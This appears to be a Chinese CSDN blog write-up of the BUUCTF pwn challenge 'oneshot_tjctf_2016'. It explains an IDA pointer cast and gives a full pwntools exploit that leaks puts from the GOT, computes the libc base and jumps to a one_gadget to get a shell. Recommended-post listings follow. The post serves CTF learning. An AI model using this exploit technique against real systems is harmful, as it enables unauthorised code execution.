BUUCTF之“oneshot_tjctf_2016”

最新推荐文章于 2024-03-30 15:58:25 发布
最新推荐文章于 2024-03-30 15:58:25 发布
阅读量614 收藏 2
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122069473
版权

咳咳,这题就是对于onegadget的简单复习:泄露libc库某个函数,然后计算基地址,结合onegadget计算execve地址。

IDA中需要注意的:

*(_QWORD *)v4

这里着重说下“*(_QWORD )”,我们将之拆开来说:
(_QWORD)意思是将八个字节的后者(v4)强制转换为8个字节的地址,而后再其前边加上星号就是提取指针“将指针指向的8个空间格子取出”,程序中的意思是,再将其以16进制形式打印出来。

WP:

from pwn import*
p=remote('node4.buuoj.cn',29008)
libc=ELF('./libc-2.23.so64')
elf=ELF('./shot')

puts_got=elf.got['puts']
p.sendlineafter("Read location?",str(puts_got))
p.recvuntil("0x")
addr_=int(p.recvuntil('\n'),16)

base=addr_-libc.symbols['puts']
onegad=base+0x45216

p.sendlineafter("Jump location?",str(onegad))
p.interactive()

WP中需要注意的:
一个是int的使用,
一个是str()的形式将"put_addr"和“onegad”输入上去:这是因为我们利用“send__的形式与远端进行交互,而send_的要求就是要发送字符,二者的都是地址,是数,所以我们的利用str()将其转成字符形式”

Hvf0x
关注
专栏目录
【ESP32 idf快速入门】ADC单次采样
m0_62599305的博客
07-29 1037
在使用 ESP32 开发时,模拟信号的采集是常见的需求,例如读取传感器数据或监测环境参数。ESP32 提供了多种方法来进行模拟信号采样,其中单次采样(oneshot)是一种非常简单且有效的方式。单次采样模式允许用户在需要时获取一个瞬时的ADC值,非常适合于对数据采样频率要求不高的应用场景。本文将介绍如何在 ESP-IDF 中使用单次采样模式进行 ADC 数据的读取,包括必要的初始化步骤以及基本的代码示例。通过这些内容,你将能够快速上手并在自己的项目中实现基本的 ADC 采样功能。函数原型作用。
在栈和堆分配内存
心想事成
10-26 474
在栈和堆分配内存LUNICODE_STRING Src ; LUNICODE_STRING *Dst1 = new LUNICODE_STRING(); LUNICODE_STRING Dst2; RtlInitLUnicodeString(&Dst2, L""); RtlInitLUnicodeString(&Src, L"microsoft-windows-ie-windows-internet
[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 849
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
oneshot_tjctf_2016
z1r0的博客
01-20 840
oneshot_tjctf_2016 查看保护 输入一个地址会跳到那个地址,再次输入会改那个地址 给got,改got为one_gadget即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25658) else: r = process(file
[BUUCTF]-PWN:oneshot_tjctf_2016解析(字符串输入,onegadget)
2301_79326813的博客
03-02 246
查看保护查看ida这道题的大致思路就是泄露libc地址,然后用onegadget来getshell但是要注意,这里要我们输入的数据类型是long int,所以不能用我们常用的p64函数了。
2016TJCTF-RE-digital_fortrees
WocW的博客
04-16 302
分析 打开题目首先是一个exe可执行文件,以为是PE文件,但是使用IDA分析后发现不是那么简单。 查找字符串发现全是python字样,并没有程序中出现的welcome类型。第一次遇到这样的,无从下手。查阅得知是Python生成的Exe可执行文件。 这时候问题又来了,百度得到的几乎都是pyinstaller的解包过程,使用后无效。然后再问,被告知可用Binwalk分离出文件,分离结果可以得到茫茫多...
one_shot_minute03.exe
10-17
one_shot_minute03.exe
unsupervised_oneshot_mnist
02-16
在IT领域,特别是机器学习和深度学习中,"unsupervised_oneshot_mnist" 提供了一个有趣的实验场景。这个项目可能涉及到无监督学习和一次学习(one-shot learning)的概念,这两种方法在图像识别和模式识别任务中都有...
one_shot_3d_photography:该存储库包含SIGGRAPH 2020论文“ One Shot 3D Photography”的代码版本
03-18
这是``Tiefenrausch''深度估计方法的代码,我们在SIGGRAPH 2020中的论文One Shot 3D Photography中进行了描述。 它复制了表1中标记为“ Tiefenrausch(AS + quant)”的行,可用于评估。 为了获得更好的质量(即与...
Few_Shot_Distribution_Calibration:[ICLR2021口头]少量学习的免费午餐
03-31
[ICLR2021口头]少量学习的免费午餐:分布校准 论文链接: : ...骨干培训 我们使用与“ S2M2_R”相同的骨干网和培训策略。 请参阅进行骨干训练。 提取并保存功能 将主干训练为“ S2M2_R”后,提取以下特征: ...
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 495
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
IDA Pro *(_QWORD *)和*(_BYTE *)表达式解释
最新发布
Jingged的博客
03-30 1763
这种类型转换和解引用的组合在反汇编和逆向工程中非常常见,因为原始源代码中的数据类型和变量名在编译过程中通常会丢失,而分析人员需要依赖工具来理解和解释机器代码。作为一个整体,通常用于将一个地址(或其他整数)转换为一个指向64位无符号整数的指针,并获取该地址上的值。时,这通常意味着某个地址或值被转换为一个指向字节的指针,并且随后会解引用该指针以获取该地址上的字节值。允许你在不知道原始数据类型的情况下,以特定的方式(这里是64位无符号整数)解释和访问内存中的数据。类似,但这里涉及的是1字节(8位)的数据。
[BMZCTF-pwn] 25-pwn3
weixin_52640415的博客
02-16 164
第三题的难度就突然上来了。程序先是个菜单,有好向项都没用;smsg先调用clear_string然后问是否发送,输入Y就退出循环 int smsg() { char v1; // [rsp+7h] [rbp-59h] BYREF void *buf; // [rsp+8h] [rbp-58h] BYREF char v3; // [rsp+10h] [rbp-50h] BYREF int v4; // [rsp+5Ch] [rbp-4h] v4 = 0; v1 = 78;
BUUCTF Reverse解题记录(三)
欢迎光临失去理智(sxhthreo)的博客~
03-03 4791
第九题:不一样的flag 这道题说实话我是看了题解才恍然大悟的。 1、2、3、4分别代表往上下左右四个方向走,由下语句: if ( v7[5 * *(_DWORD *)&v3[25] - 41 + v4] == 49 ) exit(1); if ( v7[5 * *(_DWORD *)&v3[25] - 41 + v4] == 35 ) { puts("\nok, the order you enter is the flag!"); exit(0);
bit,位,比特,比特位,byte联系与区别
热门推荐
学习笔记。
06-28 1万+
bit就是位,也叫比特位,是计算机中最小的单位 byte是字节也就是B 1byte = 1B 1byte = 2bit
关于bitcode, 知道这些就够了
chqj_163的专栏
05-15 8646
转载http://www.cocoachina.com/ios/20190108/26055.html 原文链接http://xelz.info/blog/2018/11/24/all-you-need-to-know-about-bitcode/ 0x00 前言 苹果在WWDC 2015大会上引入了bitcode,随后在Xcode7中添加了在二进制中嵌入bitcode(Ena...
C语言中怎么定义bit型数据
chenzoff的专栏
08-19 8462
怎么定义bit型数据
结构体中使用的bit操作[转帖]
whbzealot的专栏
03-05 1914
PPT(77928793)  16:37:26 毋庸置疑,位域的引入给用户的最大的好处莫过于可以有效的利用昂贵的内存和操作bit的能力了。而且这种操作bit位的能力很是方便,利用结构体域名即可对这些bit进行操作。例如: struct foo { int a : 1; int b : 2; short c : 1; }; struc
make_one_shot_iterator
09-13
### 回答1: make_one_shot_iterator是TensorFlow中的一个函数,用于创建一个只能迭代一次的迭代器。它可以用于处理一些只需要迭代一次的数据集,例如测试集或验证集。使用该函数创建的迭代器只能在定义时使用,不能在执行图时重新初始化。 ### 回答2: make_one_shot_iterator是TensorFlow中的一个函数,用于创建一个单次迭代器。迭代器在机器学习中起到非常重要的作用,主要用于批量处理数据。 make_one_shot_iterator函数接收一个数据集(Dataset)作为输入,并返回一个单次迭代器(OneShotIterator)。数据集可以通过tf.data.Dataset类进行创建,该类提供了一种高效、灵活的数据输入管道。 使用make_one_shot_iterator函数创建单次迭代器时,需要先定义一个数据集。数据集可以包含多种转换操作,如读取文件、解码图片、数据增强等。然后,使用make_one_shot_iterator函数创建一个迭代器对象。 迭代器对象可以通过get_next()方法来获取数据集中的每一个元素。在使用迭代器时,需要在TensorFlow会话中调用get_next()方法来执行迭代操作。每次调用get_next()方法时,会返回一个数据元素。 由于make_one_shot_iterator创建的是单次迭代器,即只能迭代一次数据集,因此在每次训练时需要重新创建和初始化迭代器。 总之,make_one_shot_iterator函数是TensorFlow中用于创建单次迭代器的一个重要函数,可以方便地对数据集进行批量处理,加速训练过程。 ### 回答3: make_one_shot_iterator是TensorFlow中的一个函数,用于创建一个只能迭代一次的迭代器。在TensorFlow中,使用Dataset API来处理数据,make_one_shot_iterator函数就是用来创建一个Dataset的迭代器的。 使用make_one_shot_iterator函数创建的迭代器可以用来遍历数据集中的每一个元素,但是只能迭代一次。一旦迭代器遍历完所有的元素,再次调用next方法时会抛出OutOfRangeError异常,表示迭代器已经到达了末尾。 使用make_one_shot_iterator函数的步骤如下: 1. 定义一个数据集,例如使用`tf.data.Dataset.from_tensor_slices`方法从张量或数组中创建一个数据集。 2. 使用make_one_shot_iterator函数创建一个迭代器,可以通过调用`make_one_shot_iterator.get_next()`方法来获取迭代器的下一个元素。 3. 在会话(Session)中通过循环来遍历迭代器的每一个元素,直到抛出OutOfRangeError异常。 make_one_shot_iterator函数的优点是简单易用,不需要单独初始化和关闭迭代器,可以直接在会话中使用。但是由于只能迭代一次,所以在某些场景下可能不太适用,比如需要多次迭代或需要在迭代中对数据集进行修改的情况下,可以考虑使用其他类型的迭代器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值